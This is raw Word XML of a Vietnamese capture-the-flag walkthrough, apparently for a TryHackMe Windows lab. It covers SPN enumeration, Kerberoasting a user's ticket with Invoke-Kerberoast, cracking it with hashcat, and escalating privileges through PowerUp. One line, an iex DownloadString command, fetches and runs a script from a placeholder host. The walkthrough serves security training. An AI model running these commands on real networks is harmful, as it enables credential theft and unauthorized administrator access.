        <w:ind w:right="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Đầu tiên hãy liệt kê Windows. Nếu chúng ta </w:t>
      </w:r>
      <w:r w:rsidRPr="00264030">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chạy setspn -T medin -Q */*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, chúng ta có thể trích xuất tất cả tài khoản trong SPN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D160AF" w14:textId="4976F237" w:rsidR="005D4F68" w:rsidRDefault="005D4F68" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1A0AB2" w14:textId="61FAD26A" w:rsidR="005D4F68" w:rsidRDefault="005D4F68" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4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SPN (Service Principal Name) là ánh xạ giữa dịch vụ và tài khoản.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E13805" w14:textId="77777777" w:rsidR="00412F5F" w:rsidRDefault="00412F5F" w:rsidP="00DB7A6B">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B88848" w14:textId="34D397FF" w:rsidR="007E7FA5" w:rsidRDefault="0026403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3AF557F" wp14:editId="678357FE">
            <wp:extent cx="5943600" cy="45415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ADA9E" w14:textId="6821B617" w:rsidR="00264030" w:rsidRDefault="00264030">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70537043" w14:textId="4A81AB56" w:rsidR="00264030" w:rsidRDefault="00237A9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SPN dành cho người dùng fela</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B96E440" w14:textId="16BF4C36" w:rsidR="00237A91" w:rsidRDefault="00237A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DB68E4" w14:textId="492BDD65" w:rsidR="00237A91" w:rsidRDefault="00EF1B0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Chúng ta có thể dùng Invoke-Kerberoast và lấy ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9423C" w14:textId="53CED53B" w:rsidR="00EF1B02" w:rsidRDefault="00EF1B02">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40D725AE" w14:textId="10D50F42" w:rsidR="00EF1B02" w:rsidRDefault="00EF1B0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Đầu tiên, bạn phải tải Invoke-Kerberoast</w:t>
      </w:r>
      <w:r w:rsidR="002351F3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> về máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B715D7" w14:textId="02CDC229" w:rsidR="002351F3" w:rsidRDefault="002351F3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9E4556" w14:textId="2DDF8218" w:rsidR="002351F3" w:rsidRDefault="00FF425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79E2D83" wp14:editId="685206E6">
            <wp:extent cx="6134582" cy="237256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4009" cy="24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92B4" w14:textId="629F083D" w:rsidR="00FF4258" w:rsidRDefault="00FF4258">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A0BE7F3" w14:textId="2FF3899E" w:rsidR="00FF4258" w:rsidRDefault="00D809E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Dùng Invoke-Kerberoast để đánh cắp hash của người dùng fela:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF33B28" w14:textId="0A312F52" w:rsidR="00D809EA" w:rsidRDefault="00D809EA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF122B3" w14:textId="4165D6BC" w:rsidR="00D809EA" w:rsidRPr="00546ED8" w:rsidRDefault="00D809EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546ED8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>.  .\Invoke-Kerberoast.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77686FF5" w14:textId="283D8A6D" w:rsidR="009B41C6" w:rsidRPr="00DD523A" w:rsidRDefault="00D809EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546ED8">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Invoke-Kerberoast -OutputFormat hashcat ​ |fl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD973AF" w14:textId="70BA9A80" w:rsidR="00D809EA" w:rsidRDefault="009B41C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E86B10F" wp14:editId="08B70800">
            <wp:extent cx="5943600" cy="38677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60AAC" w14:textId="65945128" w:rsidR="009B41C6" w:rsidRDefault="009B41C6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05FA6239" w14:textId="2D8E4596" w:rsidR="009B41C6" w:rsidRDefault="00546ED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Bạn đã có SPN ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461069FA" w14:textId="7EBE7787" w:rsidR="00546ED8" w:rsidRDefault="00546ED8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BFC82D5" w14:textId="6726A313" w:rsidR="00546ED8" w:rsidRDefault="00546ED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Dùng hashcat để tấn công dồn dập mật khẩu. Loại hash chúng ta đang crack là Kerberos 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00546ED8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TGS-REP etype 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và mã hashcat là 13100</w:t>
      </w:r>
      <w:r w:rsidR="0098061A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458C83DE" w14:textId="3AABA933" w:rsidR="0098061A" w:rsidRDefault="0098061A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67BBEFC0" w14:textId="2E2C6FCC" w:rsidR="0098061A" w:rsidRPr="0098061A" w:rsidRDefault="0098061A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098061A">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hashcat -m 13100 -a 0 hash.txt rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B9E65" w14:textId="35293FA5" w:rsidR="0098061A" w:rsidRDefault="0098061A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098061A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Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="0098061A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rubenF124</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C05715" w14:textId="77777777" w:rsidR="00DD523A" w:rsidRDefault="00DD523A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBF642A" w14:textId="41A5F66E" w:rsidR="00DD523A" w:rsidRDefault="00DD523A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD523A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag{bde1642535aa396d2439d86fe54a36e4}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBBD78" w14:textId="77777777" w:rsidR="00820E6A" w:rsidRPr="00DD523A" w:rsidRDefault="00820E6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16838388" w14:textId="494A6BD7" w:rsidR="00546ED8" w:rsidRPr="00B06A1B" w:rsidRDefault="00B06A1B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B06A1B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717FD9B" w14:textId="7E690FBA" w:rsidR="00B06A1B" w:rsidRDefault="00B06A1B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4756D400" w14:textId="17DCAF93" w:rsidR="0098061A" w:rsidRDefault="00025DF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Chúng ta sẽ dùng PowerShell enumeration script để kiểm tra máy ảo Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08485DD7" w14:textId="5B44C6DD" w:rsidR="00025DF2" w:rsidRDefault="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788DEA3E" w14:textId="0CDE075E" w:rsidR="00025DF2" w:rsidRDefault="00025DF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Chúng ta sẽ chạy PowerUp1.ps1 để liệt kê bất kỳ điểm yếu nào có thể bị lạm dụng để leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD6C01" w14:textId="2FB52773" w:rsidR="00025DF2" w:rsidRDefault="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766F0976" w14:textId="77777777" w:rsidR="00025DF2" w:rsidRPr="004F149B" w:rsidRDefault="00025DF2" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F149B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell -ep bypass;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B72C63" w14:textId="2EE5C09A" w:rsidR="00025DF2" w:rsidRPr="004F149B" w:rsidRDefault="00025DF2" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F149B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iex​(New-Object Net.WebClient).DownloadString('http://YOUR_IP/PowerUp.ps1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1A956F" w14:textId="79E393B8" w:rsidR="00025DF2" w:rsidRDefault="00025DF2" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA6F63A" w14:textId="757C873F" w:rsidR="00025DF2" w:rsidRDefault="007936B5" w:rsidP="00025DF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Tập lệnh xác định một số cách để có được quyền truy cập của quản trị. Đầu tiên là bypassUAC và </w:t>
      </w:r>
      <w:r w:rsidR="00820E6A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thứ hai là </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UnattendedPath. Chúng ta sẽ khai thác Un</w:t>
      </w:r>
      <w:r w:rsidR="004F149B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attendedPath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B675C" w14:textId="71C8E7D2" w:rsidR="000D7BCC" w:rsidRDefault="000D7BCC" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4372545B" w14:textId="2B100864" w:rsidR="000D7BCC" w:rsidRDefault="000D7BCC" w:rsidP="00025DF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20CBDFE" wp14:editId="3A7BD83A">
            <wp:extent cx="5301205" cy="2599629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856" cy="260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F414" w14:textId="77777777" w:rsidR="004F149B" w:rsidRDefault="004F149B" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E22A47" w14:textId="0D968B4D" w:rsidR="000D7BCC" w:rsidRDefault="004F149B" w:rsidP="00025DF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A66583D" wp14:editId="3042BCCC">
            <wp:extent cx="5300980" cy="105453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447" cy="10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AB840" w14:textId="102B60B2" w:rsidR="004F149B" w:rsidRDefault="004F149B" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B29404A" w14:textId="32ABA2EC" w:rsidR="004F149B" w:rsidRDefault="005B3991" w:rsidP="00025DF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Mật khẩu của quản trị viên được lưu ở định dạng Base64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95FEC3" w14:textId="7E5B8688" w:rsidR="005B3991" w:rsidRDefault="005B3991" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18450DD0" w14:textId="0B51A376" w:rsidR="005B3991" w:rsidRDefault="005B3991" w:rsidP="00025DF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Đăng nhập với tư cách quản trị viên và nhận flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F88A52" w14:textId="3ADF4092" w:rsidR="00A333E8" w:rsidRDefault="00A333E8" w:rsidP="00025DF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4B1484" w14:textId="300A132C" w:rsidR="00EF1B02" w:rsidRPr="007E7FA5" w:rsidRDefault="00A333E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A333E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: THM{g00d_j0b_SYS4DM1n_M4s73R}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00EF1B02" w:rsidRPr="007E7FA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2A5651F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EDC7A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996F5F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0CE36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77B4"/>
    <w:rsid w:val="00025DF2"/>
    <w:rsid w:val="00087429"/>
    <w:rsid w:val="000D7BCC"/>
    <w:rsid w:val="000E4F5D"/>
    <w:rsid w:val="001759C0"/>
    <w:rsid w:val="002351F3"/>
    <w:rsid w:val="00237A91"/>
    <w:rsid w:val="00263EE2"/>
    <w:rsid w:val="00264030"/>
    <w:rsid w:val="00281579"/>
    <w:rsid w:val="002D697E"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00344F2B"/>
    <w:rsid w:val="003D5B7F"/>
    <w:rsid w:val="003E3D10"/>
    <w:rsid w:val="00412F5F"/>
    <w:rsid w:val="00467547"/>
    <w:rsid w:val="004810A5"/>
    <w:rsid w:val="004F149B"/>
    <w:rsid w:val="00501B81"/>
    <w:rsid w:val="00546ED8"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005B3991"/>
    <w:rsid w:val="005D4F68"/>
    <w:rsid w:val="007127D2"/>
    <w:rsid w:val="007473C5"/>
    <w:rsid w:val="007936B5"/>
    <w:rsid w:val="007E7FA5"/>
    <w:rsid w:val="00820E6A"/>
    <w:rsid w:val="00833052"/>
    <w:rsid w:val="008C6A71"/>
    <w:rsid w:val="0098061A"/>
    <w:rsid w:val="009B41C6"/>
    <w:rsid w:val="00A10763"/>
    <w:rsid w:val="00A333E8"/>
    <w:rsid w:val="00AB7C77"/>
    <w:rsid w:val="00B06A1B"/>
    <w:rsid w:val="00BC033E"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C01F5C"/>
    <w:rsid w:val="00CA4C7B"/>
    <w:rsid w:val="00D23C1D"/>
    <w:rsid w:val="00D47771"/>
    <w:rsid w:val="00D809EA"/>
    <w:rsid w:val="00DB7A6B"/>
    <w:rsid w:val="00DD523A"/>
    <w:rsid w:val="00DE379D"/>
    <w:rsid w:val="00EA77B4"/>
    <w:rsid w:val="00EF1B02"/>
    <w:rsid w:val="00F72905"/>
    <w:rsid w:val="00FF42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63B29B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2BA389A8-5FD7-B04B-836C-BE37222F4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8330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7</Pages>
  <Words>483</Words>
  <Characters>2759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43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-27T10:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-09T08:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>